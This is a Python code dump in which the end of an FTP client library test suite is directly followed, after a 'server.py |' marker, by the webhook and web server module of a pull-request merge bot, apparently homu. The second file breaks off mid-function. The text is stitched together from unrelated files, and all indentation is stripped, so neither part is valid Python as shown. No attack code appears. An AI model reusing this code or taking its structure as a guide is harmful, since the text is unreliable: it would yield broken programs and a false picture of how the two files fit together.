self.assertEqual(self.client.sanitize('PASS 12345'), repr('PASS *****')
)
def test_exceptions(self):
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 400')
self.assertRaises(ftplib.error_temp, self.client.sendcmd, 'echo 499')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 500')
self.assertRaises(ftplib.error_perm, self.client.sendcmd, 'echo 599')
self.assertRaises(ftplib.error_proto, self.client.sendcmd, 'echo 999')
def test_all_errors(self):
exceptions = (ftplib.error_reply, ftplib.error_temp, ftplib.
error_perm, ftplib.error_proto, ftplib.Error, OSError, EOFError)
for x in exceptions:
try:
raise x('exception not included in all_errors set')
except ftplib.all_errors:
pass
def test_set_pasv(self):
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(True)
self.assertTrue(self.client.passiveserver)
self.client.set_pasv(False)
self.assertFalse(self.client.passiveserver)
def test_voidcmd(self):
self.client.voidcmd('echo 200')
self.client.voidcmd('echo 299')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 199')
self.assertRaises(ftplib.error_reply, self.client.voidcmd, 'echo 300')
def test_login(self):
self.client.login()
def test_acct(self):
self.client.acct('passwd')
def test_rename(self):
self.client.rename('a', 'b')
self.server.handler_instance.next_response = '200'
self.assertRaises(ftplib.error_reply, self.client.rename, 'a', 'b')
def test_delete(self):
self.client.delete('foo')
self.server.handler_instance.next_response = '199'
self.assertRaises(ftplib.error_reply, self.client.delete, 'foo')
def test_size(self):
self.client.size('foo')
def test_mkd(self):
dir = self.client.mkd('/foo')
self.assertEqual(dir, '/foo')
def test_rmd(self):
self.client.rmd('foo')
def test_cwd(self):
dir = self.client.cwd('/foo')
self.assertEqual(dir, '250 cwd ok')
def test_pwd(self):
dir = self.client.pwd()
self.assertEqual(dir, 'pwd ok')
def test_quit(self):
self.assertEqual(self.client.quit(), '221 quit ok')
self.assertEqual(self.client.sock, None)
def test_abort(self):
self.client.abort()
def test_retrbinary(self):
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.check_data(''.join(received), RETR_DATA)
def test_retrbinary_rest(self):
def callback(data):
received.append(data.decode('ascii'))
for rest in (0, 10, 20):
received = []
self.client.retrbinary('retr', callback, rest=rest)
self.check_data(''.join(received), RETR_DATA[rest:])
def test_retrlines(self):
received = []
self.client.retrlines('retr', received.append)
self.check_data(''.join(received), RETR_DATA.replace('\r\n', ''))
def test_storbinary(self):
f = io.BytesIO(RETR_DATA.encode('ascii'))
self.client.storbinary('stor', f)
self.check_data(self.server.handler_instance.last_received_data,
RETR_DATA)
flag = []
f.seek(0)
self.client.storbinary('stor', f, callback=lambda x: flag.append(None))
self.assertTrue(flag)
def test_storbinary_rest(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
for r in (30, '30'):
f.seek(0)
self.client.storbinary('stor', f, rest=r)
self.assertEqual(self.server.handler_instance.rest, str(r))
def test_storlines(self):
f = io.BytesIO(RETR_DATA.replace('\r\n', '\n').encode('ascii'))
self.client.storlines('stor', f)
self.check_data(self.server.handler_instance.last_received_data,
RETR_DATA)
flag = []
f.seek(0)
self.client.storlines('stor foo', f, callback=lambda x: flag.append
(None))
self.assertTrue(flag)
f = io.StringIO(RETR_DATA.replace('\r\n', '\n'))
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises(TypeError, self.client.storlines, 'stor foo', f)
def test_nlst(self):
self.client.nlst()
self.assertEqual(self.client.nlst(), NLST_DATA.split('\r\n')[:-1])
def test_dir(self):
l = []
self.client.dir(lambda x: l.append(x))
self.assertEqual(''.join(l), LIST_DATA.replace('\r\n', ''))
def test_mlsd(self):
list(self.client.mlsd())
list(self.client.mlsd(path='/'))
list(self.client.mlsd(path='/', facts=['size', 'type']))
ls = list(self.client.mlsd())
for name, facts in ls:
self.assertIsInstance(name, str)
self.assertIsInstance(facts, dict)
self.assertTrue(name)
self.assertIn('type', facts)
self.assertIn('perm', facts)
self.assertIn('unique', facts)
def set_data(data):
self.server.handler_instance.next_data = data
def test_entry(line, type=None, perm=None, unique=None, name=None):
type = 'type' if type is None else type
perm = 'perm' if perm is None else perm
unique = 'unique' if unique is None else unique
name = 'name' if name is None else name
set_data(line)
_name, facts = next(self.client.mlsd())
self.assertEqual(_name, name)
self.assertEqual(facts['type'], type)
self.assertEqual(facts['perm'], perm)
self.assertEqual(facts['unique'], unique)
test_entry('type=type;perm=perm;unique=unique; name\r\n')
test_entry('type=ty=pe;perm=perm;unique=unique; name\r\n', type='ty=pe'
)
test_entry('type==type;perm=perm;unique=unique; name\r\n', type='=type'
)
test_entry('type=t=y=pe;perm=perm;unique=unique; name\r\n', type=
't=y=pe')
test_entry('type=====;perm=perm;unique=unique; name\r\n', type='====')
test_entry('type=type;perm=perm;unique=unique; na me\r\n', name='na me'
)
test_entry('type=type;perm=perm;unique=unique; name \r\n', name='name '
)
test_entry('type=type;perm=perm;unique=unique; name\r\n', name=' name'
)
test_entry('type=type;perm=perm;unique=unique; n am e\r\n', name=
'n am e')
test_entry('type=type;perm=perm;unique=unique; na;me\r\n', name='na;me'
)
test_entry('type=type;perm=perm;unique=unique; ;name\r\n', name=';name'
)
test_entry('type=type;perm=perm;unique=unique; ;name;\r\n', name=
';name;')
test_entry('type=type;perm=perm;unique=unique; ;;;;\r\n', name=';;;;')
set_data('Type=type;TyPe=perm;UNIQUE=unique; name\r\n')
_name, facts = next(self.client.mlsd())
for x in facts:
self.assertTrue(x.islower())
set_data('')
self.assertRaises(StopIteration, next, self.client.mlsd())
set_data('')
for x in self.client.mlsd():
self.fail('unexpected data %s' % x)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'port')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'pasv'
)
def test_with_statement(self):
self.client.quit()
def is_client_connected():
if self.client.sock is None:
return False
try:
self.client.sendcmd('noop')
except (OSError, EOFError):
return False
return True
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.assertTrue(is_client_connected())
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit'
)
self.assertFalse(is_client_connected())
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.client.quit()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit'
)
self.assertFalse(is_client_connected())
try:
with ftplib.FTP(timeout=TIMEOUT) as self.client:
self.client.connect(self.server.host, self.server.port)
self.client.sendcmd('noop')
self.server.handler_instance.next_response = (
'550 error on quit')
except ftplib.error_perm as err:
self.assertEqual(str(err), '550 error on quit')
else:
self.fail('Exception not raised')
time.sleep(0.1)
self.assertEqual(self.server.handler_instance.last_received_cmd, 'quit'
)
self.assertFalse(is_client_connected())
def test_source_address(self):
self.client.quit()
port = support.find_unused_port()
try:
self.client.connect(self.server.host, self.server.port,
source_address=(HOST, port))
self.assertEqual(self.client.sock.getsockname()[1], port)
self.client.quit()
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_source_address_passive_connection(self):
port = support.find_unused_port()
self.client.source_address = HOST, port
try:
with self.client.transfercmd('list') as sock:
self.assertEqual(sock.getsockname()[1], port)
except OSError as e:
if e.errno == errno.EADDRINUSE:
self.skipTest("couldn't bind to port %d" % port)
raise
def test_parse257(self):
self.assertEqual(ftplib.parse257('257 "/foo/bar"'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 "/foo/bar" created'), '/foo/bar')
self.assertEqual(ftplib.parse257('257 ""'), '')
self.assertEqual(ftplib.parse257('257 "" created'), '')
self.assertRaises(ftplib.error_reply, ftplib.parse257, '250 "/foo/bar"'
)
self.assertEqual(ftplib.parse257('257 "/foo/b""ar"'), '/foo/b"ar')
self.assertEqual(ftplib.parse257('257 "/foo/b""ar" created'),
'/foo/b"ar')
def test_line_too_long(self):
self.assertRaises(ftplib.Error, self.client.sendcmd, 'x' * self.
client.maxline * 2)
def test_retrlines_too_long(self):
self.client.sendcmd('SETLONGRETR %d' % (self.client.maxline * 2))
received = []
self.assertRaises(ftplib.Error, self.client.retrlines, 'retr',
received.append)
def test_storlines_too_long(self):
f = io.BytesIO(b'x' * self.client.maxline * 2)
self.assertRaises(ftplib.Error, self.client.storlines, 'stor', f)
@skipUnless(support.IPV6_ENABLED, 'IPv6 not enabled')
class TestIPv6Environment(TestCase):
def setUp(self):
self.server = DummyFTPServer((HOSTv6, 0), af=socket.AF_INET6)
self.server.start()
self.client = ftplib.FTP(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_af(self):
self.assertEqual(self.client.af, socket.AF_INET6)
def test_makeport(self):
with self.client.makeport():
self.assertEqual(self.server.handler_instance.last_received_cmd,
'eprt')
def test_makepasv(self):
host, port = self.client.makepasv()
conn = socket.create_connection((host, port), timeout=TIMEOUT)
conn.close()
self.assertEqual(self.server.handler_instance.last_received_cmd, 'epsv'
)
def test_transfer(self):
def retr():
def callback(data):
received.append(data.decode('ascii'))
received = []
self.client.retrbinary('retr', callback)
self.assertEqual(len(''.join(received)), len(RETR_DATA))
self.assertEqual(''.join(received), RETR_DATA)
self.client.set_pasv(True)
retr()
self.client.set_pasv(False)
retr()
@skipUnless(ssl, 'SSL not available')
class TestTLS_FTPClassMixin(TestFTPClass):
"""Repeat TestFTPClass tests starting the TLS layer for both control
and data connections first.
"""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.client.auth()
self.client.prot_p()
@skipUnless(ssl, 'SSL not available')
class TestTLS_FTPClass(TestCase):
"""Specific TLS_FTP class tests."""
def setUp(self):
self.server = DummyTLS_FTPServer((HOST, 0))
self.server.start()
self.client = ftplib.FTP_TLS(timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
def tearDown(self):
self.client.close()
self.server.stop()
def test_control_connection(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
def test_data_connection(self):
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), '226 transfer complete')
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), '226 transfer complete')
self.client.prot_c()
with self.client.transfercmd('list') as sock:
self.assertNotIsInstance(sock, ssl.SSLSocket)
self.assertEqual(self.client.voidresp(), '226 transfer complete')
def test_login(self):
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.login()
def test_auth_issued_twice(self):
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
def test_auth_ssl(self):
try:
self.client.ssl_version = ssl.PROTOCOL_SSLv23
self.client.auth()
self.assertRaises(ValueError, self.client.auth)
finally:
self.client.ssl_version = ssl.PROTOCOL_TLSv1
def test_context(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
self.assertRaises(ValueError, ftplib.FTP_TLS, keyfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
context=ctx)
self.assertRaises(ValueError, ftplib.FTP_TLS, certfile=CERTFILE,
keyfile=CERTFILE, context=ctx)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
self.assertNotIsInstance(self.client.sock, ssl.SSLSocket)
self.client.auth()
self.assertIs(self.client.sock.context, ctx)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
self.assertIs(sock.context, ctx)
self.assertIsInstance(sock, ssl.SSLSocket)
def test_ccc(self):
self.assertRaises(ValueError, self.client.ccc)
self.client.login(secure=True)
self.assertIsInstance(self.client.sock, ssl.SSLSocket)
self.client.ccc()
self.assertRaises(ValueError, self.client.sock.unwrap)
def test_check_hostname(self):
self.client.quit()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.check_hostname = True
ctx.load_verify_locations(CAFILE)
self.client = ftplib.FTP_TLS(context=ctx, timeout=TIMEOUT)
self.client.connect(self.server.host, self.server.port)
with self.assertRaises(ssl.CertificateError):
self.client.auth()
self.client.connect(self.server.host, self.server.port)
self.client.prot_p()
with self.assertRaises(ssl.CertificateError):
with self.client.transfercmd('list') as sock:
pass
self.client.quit()
self.client.connect('localhost', self.server.port)
self.client.auth()
self.client.quit()
self.client.connect('localhost', self.server.port)
self.client.prot_p()
with self.client.transfercmd('list') as sock:
pass
class TestTimeouts(TestCase):
def setUp(self):
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(20)
self.port = support.bind_port(self.sock)
self.server_thread = threading.Thread(target=self.server)
self.server_thread.start()
self.evt.wait()
self.evt.clear()
self.old_port = ftplib.FTP.port
ftplib.FTP.port = self.port
def tearDown(self):
ftplib.FTP.port = self.old_port
self.server_thread.join()
def server(self):
self.sock.listen()
self.evt.set()
try:
conn, addr = self.sock.accept()
except socket.timeout:
pass
else:
conn.sendall(b'1 Hola mundo\n')
conn.shutdown(socket.SHUT_WR)
self.evt.set()
conn.close()
finally:
self.sock.close()
def testTimeoutDefault(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST)
finally:
socket.setdefaulttimeout(None)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutNone(self):
self.assertIsNone(socket.getdefaulttimeout())
socket.setdefaulttimeout(30)
try:
ftp = ftplib.FTP(HOST, timeout=None)
finally:
socket.setdefaulttimeout(None)
self.assertIsNone(ftp.sock.gettimeout())
self.evt.wait()
ftp.close()
def testTimeoutValue(self):
ftp = ftplib.FTP(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutConnect(self):
ftp = ftplib.FTP()
ftp.connect(HOST, timeout=30)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDifferentOrder(self):
ftp = ftplib.FTP(timeout=30)
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
def testTimeoutDirectAccess(self):
ftp = ftplib.FTP()
ftp.timeout = 30
ftp.connect(HOST)
self.assertEqual(ftp.sock.gettimeout(), 30)
self.evt.wait()
ftp.close()
class MiscTestCase(TestCase):
def test__all__(self):
blacklist = {'MSG_OOB', 'FTP_PORT', 'MAXLINE', 'CRLF', 'B_CRLF',
'Error', 'parse150', 'parse227', 'parse229', 'parse257',
'print_line', 'ftpcp', 'test'}
support.check__all__(self, ftplib, blacklist=blacklist)
def test_main():
tests = [TestFTPClass, TestTimeouts, TestIPv6Environment,
TestTLS_FTPClassMixin, TestTLS_FTPClass, MiscTestCase]
thread_info = support.threading_setup()
try:
support.run_unittest(*tests)
finally:
support.threading_cleanup(*thread_info)
if __name__ == '__main__':
test_main()
|
server.py | import hmac
import json
import urllib.parse
from .main import (
PullReqState,
parse_commands,
db_query,
INTERRUPTED_BY_HOMU_RE,
synchronize,
)
from .action import LabelEvent
from . import utils
from .utils import lazy_debug
import github3
import jinja2
import requests
import pkg_resources
from bottle import (
get,
post,
run,
request,
redirect,
abort,
response,
)
from threading import Thread
import sys
import os
import traceback
from retrying import retry
import bottle
bottle.BaseRequest.MEMFILE_MAX = 1024 * 1024 * 10
class G:
pass
g = G()
def find_state(sha):
for repo_label, repo_states in g.states.items():
for state in repo_states.values():
if state.merge_sha == sha:
return state, repo_label
raise ValueError('Invalid SHA')
def get_repo(repo_label, repo_cfg):
repo = g.repos[repo_label].gh
if not repo:
repo = g.gh.repository(repo_cfg['owner'], repo_cfg['name'])
g.repos[repo_label] = repo
assert repo.owner.login == repo_cfg['owner']
assert repo.name == repo_cfg['name']
return repo
@get('/')
def index():
return g.tpls['index'].render(repos=[g.repos[label]
for label in sorted(g.repos)])
@get('/results/<repo_label:path>/<pull:int>')
def result(repo_label, pull):
if repo_label not in g.states:
abort(404, 'No such repository: {}'.format(repo_label))
states = [state for state in g.states[repo_label].values()
if state.num == pull]
if len(states) == 0:
return 'No build results for pull request {}'.format(pull)
state = states[0]
builders = []
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'])
for (builder, data) in state.build_res.items():
result = "pending"
if data['res'] is not None:
result = "success" if data['res'] else "failed"
if not data['url']:
# This happens to old try builds
return 'No build results for pull request {}'.format(pull)
builders.append({
'url': data['url'],
'result': result,
'name': builder,
})
return g.tpls['build_res'].render(repo_label=repo_label, repo_url=repo_url,
builders=builders, pull=pull)
@get('/queue/<repo_label:path>')
def queue(repo_label):
logger = g.logger.getChild('queue')
lazy_debug(logger, lambda: 'repo_label: {}'.format(repo_label))
single_repo_closed = None
if repo_label == 'all':
labels = g.repos.keys()
multiple = True
repo_url = None
else:
labels = repo_label.split('+')
multiple = len(labels) > 1
if repo_label in g.repos and g.repos[repo_label].treeclosed >= 0:
single_repo_closed = g.repos[repo_label].treeclosed
repo_url = 'https://github.com/{}/{}'.format(
g.cfg['repo'][repo_label]['owner'],
g.cfg['repo'][repo_label]['name'])
states = []
for label in labels:
try:
states += g.states[label].values()
except KeyError:
abort(404, 'No such repository: {}'.format(label))
pull_states = sorted(states)
rows = []
for state in pull_states:
treeclosed = (single_repo_closed or
state.priority < g.repos[state.repo_label].treeclosed)
status_ext = ''
if state.try_:
status_ext += ' (try)'
if treeclosed:
status_ext += ' [TREE CLOSED]'
rows.append({
'status': state.get_status(),
'status_ext': status_ext,
'priority': 'rollup' if state.rollup else state.priority,
'url': 'https://github.com/{}/{}/pull/{}'.format(state.owner,
state.name,
state.num),
'num': state.num,
'approved_by': state.approved_by,
'title': state.title,
'head_ref': state.head_ref,
'mergeable': ('yes' if state.mergeable is True else
'no' if state.mergeable is False else ''),
'assignee': state.assignee,
'repo_label': state.repo_label,
'repo_url': 'https://github.com/{}/{}'.format(state.owner,
state.name),
'greyed': "treeclosed" if treeclosed else "",
})
return g.tpls['queue'].render(
repo_url=repo_url,
repo_label=repo_label,
treeclosed=single_repo_closed,
states=rows,
oauth_client_id=g.cfg['github']['app_client_id'],
total=len(pull_states),
approved=len([x for x in pull_states if x.approved_by]),
rolled_up=len([x for x in pull_states if x.rollup]),
failed=len([x for x in pull_states if x.status == 'failure' or
x.status == 'error']),
multiple=multiple,
)
@get('/callback')
def callback():
logger = g.logger.getChild('callback')
response.content_type = 'text/plain'
code = request.query.code
state = json.loads(request.query.state)
lazy_debug(logger, lambda: 'state: {}'.format(state))
oauth_url = 'https://github.com/login/oauth/access_token'
try:
res = requests.post(oauth_url, data={
'client_id': g.cfg['github']['app_client_id'],
'client_secret': g.cfg['github']['app_client_secret'],
'code': code,
})
except Exception as ex: # noqa
logger.warn('/callback encountered an error '
'during github oauth callback')
# probably related to https://gitlab.com/pycqa/flake8/issues/42
lazy_debug(
logger,
lambda ex=ex: 'github oauth callback err: {}'.format(ex),
)
abort(502, 'Bad Gateway')
args = urllib.parse.parse_qs(res.text)
token = args['access_token'][0]
repo_label = state['repo_label']
repo_cfg = g.repo_cfgs[repo_label]
repo = get_repo(repo_label, repo_cfg)
user_gh = github3.login(token=token)
if state['cmd'] == 'rollup':
return rollup(user_gh, state, repo_label, repo_cfg, repo)
elif state['cmd'] == 'synch':
return synch(user_gh, state, repo_label, repo_cfg, repo)
else:
abort(400, 'Invalid command')
def rollup(user_gh, state, repo_label, repo_cfg, repo):
user_repo = user_gh.repository(user_gh.user().login, repo.name)
base_repo = user_gh.repository(repo.owner.login, repo.name)
nums = state.get('nums', [])
if nums:
try:
rollup_states = [g.states[repo_label][num] for num in nums]
except KeyError as e:
return 'Invalid PR number: {}'.format(e.args[0])
else:
rollup_states = [x for x in g.states[repo_label].values() if x.rollup]
rollup_states = [x for x in rollup_states if x.approved_by]
rollup_states.sort(key=lambda x: x.num)
if not rollup_states:
return 'No pull requests are marked as rollup'
base_ref = rollup_states[0].base_ref
base_sha = repo.ref('heads/' + base_ref).object.sha
utils.github_set_ref(
user_repo,
'heads/' + repo_cfg.get('branch', {}).get('rollup', 'rollup'),
base_sha,
force=True,
)
successes = []
failures = []
for state in rollup_states:
if base_ref != state.base_ref:
failures.append(state.num)
continue
merge_msg = 'Rollup merge of #{} - {}, r={}\n\n{}\n\n{}'.format(
state.num,
state.head_ref,
state.approved_by,
state.title,
state.body,
)
try:
rollup = repo_cfg.get('branch', {}).get('rollup', 'rollup')
user_repo.merge(rollup, state.head_sha, merge_msg)
except github3.models.GitHubError as e:
if e.code != 409:
raise
failures.append(state.num)
else:
successes.append(state.num)
title = 'Rollup of {} pull requests'.format(len(successes))
body = '- Successful merges: {}\n- Failed merges: {}'.format(
', '.join('#{}'.format(x) for x in successes),
', '.join('#{}'.format(x) for x in failures),
)
try:
rollup = repo_cfg.get('branch', {}).get('rollup', 'rollup')
pull = base_repo.create_pull(
title,
state.base_ref,
user_repo.owner.login + ':' + rollup,
body,
)
except github3.models.GitHubError as e:
return e.response.text
else:
redirect(pull.html_url)
@post('/github')
def github():
logger = g.logger.getChild('github')
response.content_type = 'text/plain'
payload = request.body.read()
info = request.json
lazy_debug(logger, lambda: 'info: {}'.format(utils.remove_url_keys_from_json(info))) # noqa
owner_info = info['repository']['owner']
owner = owner_info.get('login') or owner_info['name']
repo_label = g.repo_labels[owner, info['repository']['name']]
repo_cfg = g.repo_cfgs[repo_label]
hmac_method, hmac_sig = request.headers['X-Hub-Signature'].split('=')
if hmac_sig != hmac.new(
repo_cfg['github']['secret'].encode('utf-8'),
payload,
hmac_method,
).hexdigest():
abort(400, 'Invalid signature')
event_type = request.headers['X-Github-Event']
if event_type == 'pull_request_review_comment':
action = info['action']
original_commit_id = info['comment']['original_commit_id']
head_sha = info['pull_request']['head']['sha']
if action == 'created' and original_commit_id == head_sha:
pull_num = info['pull_request']['number']
body = info['comment']['body']
username = info['sender']['login']
state = g.states[repo_label].get(pull_num)
if state:
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
if parse_commands(
g.cfg,
body,
username,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
sha=original_commit_id,
):
state.save()
g.queue_handler()
elif event_type == 'pull_request_review':
action = info['action']
commit_id = info['review']['commit_id']
head_sha = info['pull_request']['head']['sha']
if action == 'submitted' and commit_id == head_sha:
pull_num = info['pull_request']['number']
body = info['review']['body']
username = info['sender']['login']
state = g.states[repo_label].get(pull_num)
if state:
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
if parse_commands(
g.cfg,
body,
username,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
sha=commit_id,
):
state.save()
g.queue_handler()
elif event_type == 'pull_request':
action = info['action']
pull_num = info['number']
head_sha = info['pull_request']['head']['sha']
if action == 'synchronize':
state = g.states[repo_label][pull_num]
state.head_advanced(head_sha)
state.save()
elif action in ['opened', 'reopened']:
state = PullReqState(pull_num, head_sha, '', g.db, repo_label,
g.mergeable_que, g.gh,
info['repository']['owner']['login'],
info['repository']['name'],
repo_cfg.get('labels', {}),
g.repos)
state.title = info['pull_request']['title']
state.body = info['pull_request']['body']
state.head_ref = info['pull_request']['head']['repo']['owner']['login'] + ':' + info['pull_request']['head']['ref'] # noqa
state.base_ref = info['pull_request']['base']['ref']
state.set_mergeable(info['pull_request']['mergeable'])
state.assignee = (info['pull_request']['assignee']['login'] if
info['pull_request']['assignee'] else '')
found = False
if action == 'reopened':
# FIXME: Review comments are ignored here
for c in state.get_repo().issue(pull_num).iter_comments():
found = parse_commands(
g.cfg,
c.body,
c.user.login,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
) or found
status = ''
for info in utils.github_iter_statuses(state.get_repo(),
state.head_sha):
if info.context == 'homu':
status = info.state
break
state.set_status(status)
state.save()
g.states[repo_label][pull_num] = state
if found:
g.queue_handler()
elif action == 'closed':
state = g.states[repo_label][pull_num]
if hasattr(state, 'fake_merge_sha'):
def inner():
utils.github_set_ref(
state.get_repo(),
'heads/' + state.base_ref,
state.merge_sha,
force=True,
)
def fail(err):
state.add_comment(':boom: Failed to recover from the '
'artificial commit. See {} for details.'
' ({})'.format(state.fake_merge_sha,
err))
utils.retry_until(inner, fail, state)
del g.states[repo_label][pull_num]
db_query(g.db, 'DELETE FROM pull WHERE repo = ? AND num = ?',
[repo_label, pull_num])
db_query(g.db, 'DELETE FROM build_res WHERE repo = ? AND num = ?',
[repo_label, pull_num])
db_query(g.db, 'DELETE FROM mergeable WHERE repo = ? AND num = ?',
[repo_label, pull_num])
g.queue_handler()
elif action in ['assigned', 'unassigned']:
state = g.states[repo_label][pull_num]
state.assignee = (info['pull_request']['assignee']['login'] if
info['pull_request']['assignee'] else '')
state.save()
else:
lazy_debug(logger, lambda: 'Invalid pull_request action: {}'.format(action)) # noqa
elif event_type == 'push':
ref = info['ref'][len('refs/heads/'):]
for state in list(g.states[repo_label].values()):
if state.base_ref == ref:
state.set_mergeable(None, cause={
'sha': info['head_commit']['id'],
'title': info['head_commit']['message'].splitlines()[0],
})
if state.head_sha == info['before']:
if state.status:
state.change_labels(LabelEvent.PUSHED)
state.head_advanced(info['after'])
state.save()
elif event_type == 'issue_comment':
body = info['comment']['body']
username = info['comment']['user']['login']
pull_num = info['issue']['number']
state = g.states[repo_label].get(pull_num)
if 'pull_request' in info['issue'] and state:
state.title = info['issue']['title']
state.body = info['issue']['body']
if parse_commands(
g.cfg,
body,
username,
repo_cfg,
state,
g.my_username,
g.db,
g.states,
realtime=True,
):
state.save()
g.queue_handler()
elif event_type == 'status':
try:
state, repo_label = find_state(info['sha'])
except ValueError:
return 'OK'
status_name = ""
if 'status' in repo_cfg:
for name, value in repo_cfg['status'].items():
if 'context' in value and value['context'] == info['context']:
status_name = name
if status_name == "":
return 'OK'
if info['state'] == 'pending':
return 'OK'
for row in info['branches']:
if row['name'] == state.base_ref:
return 'OK'
report_build_res(info['state'] == 'success', info['target_url'],
'status-' + status_name, state, logger, repo_cfg)
elif event_type == 'check_run':
try:
state, repo_label = find_state(info['check_run']['head_sha'])
except ValueError:
return 'OK'
current_run_name = info['check_run']['name']
checks_name = None
if 'checks' in repo_cfg:
for name, value in repo_cfg['checks'].items():
if 'name' in value and value['name'] == current_run_name:
checks_name = name
if checks_name is None:
return 'OK'
if info['check_run']['status'] != 'completed':
return 'OK'
if info['check_run']['conclusion'] is None:
return 'OK'
report_build_res(
info['check_run']['conclusion'] == 'success',
info['check_run']['details_url'],
'checks-' + checks_name,
state, logger, repo_cfg,
)
return 'OK'
def report_build_res(succ, url, builder, state, logger, repo_cfg):
lazy_debug(logger,
lambda: 'build result {}: builder = {}, succ = {}, current build_res = {}' # noqa
.format(state, builder, succ,
state.build_res_summary()))
state.set_build_res(builder, succ, url)
if succ:
if all(x['res'] for x in state.build_res.values()):
state.set_status('success')
desc = 'Test successful'
utils.github_create_status(state.get_repo(), state.head_sha,
'success', url, desc, context='homu')
urls = ', '.join('[{}]({})'.format(builder, x['url']) for builder, x in sorted(state.build_res.items())) # noqa
test_comment = ':sunny: {} - {}'.format(desc, urls)
if state.approved_by and not state.try_:
comment = (test_comment + '\n' +
'Approved by: {}\nPushing {} to {}...'
).format(state.approved_by, state.merge_sha,
state.base_ref)
state.add_comment(comment)
state.change_labels(LabelEvent.SUCCEED)
try:
try:
utils.github_set_ref(state.get_repo(), 'heads/' +
state.base_ref, state.merge_sha)
except github3.models.GitHubError:
utils.github_create_status(
state.get_repo(),
state.merge_sha,
'success', '',
'Branch protection bypassed',
context='homu')
utils.github_set_ref(state.get_repo(), 'heads/' +
state.base_ref, state.merge_sha)
state.fake_merge(repo_cfg)
except github3.models.GitHubError as e:
state.set_status('error')
desc = ('Test was successful, but fast-forwarding failed:'
' {}'.format(e))
utils.github_create_status(state.get_repo(),
state.head_sha, 'error', url,
desc, context='homu')
state.add_comment(':eyes: ' + desc)
else:
comment = (test_comment + '\n' +
'State: approved={} try={}'
).format(state.approved_by, state.try_)
state.add_comment(comment)
state.change_labels(LabelEvent.TRY_SUCCEED)
else:
if state.status == 'pending':
state.set_status('failure')
desc = 'Test failed'
utils.github_create_status(state.get_repo(), state.head_sha,
'failure', url, desc, context='homu')
state.add_comment(':broken_heart: {} - [{}]({})'.format(desc,
builder,
url))
event = LabelEvent.TRY_FAILED if state.try_ else LabelEvent.FAILED
state.change_labels(event)
g.queue_handler()
@post('/buildbot')
def buildbot():
logger = g.logger.getChild('buildbot')
response.content_type = 'text/plain'
for row in json.loads(request.forms.packets):
if row['event'] == 'buildFinished':
info = row['payload']['build']
lazy_debug(logger, lambda: 'info: {}'.format(info))
props = dict(x[:2] for x in info['properties'])
if 'retry' in info['text']:
continue
if not props['revision']:
continue
try:
state, repo_label = find_state(props['revision'])
except ValueError:
lazy_debug(logger,
lambda: 'Invalid commit ID from Buildbot: {}'.format(props['revision'])) # noqa
continue
lazy_debug(logger, lambda: 'state: {}, {}'.format(state, state.build_res_summary())) # noqa
if info['builderName'] not in state.build_res:
lazy_debug(logger,
lambda: 'Invalid builder from Buildbot: {}'.format(info['builderName'])) # noqa
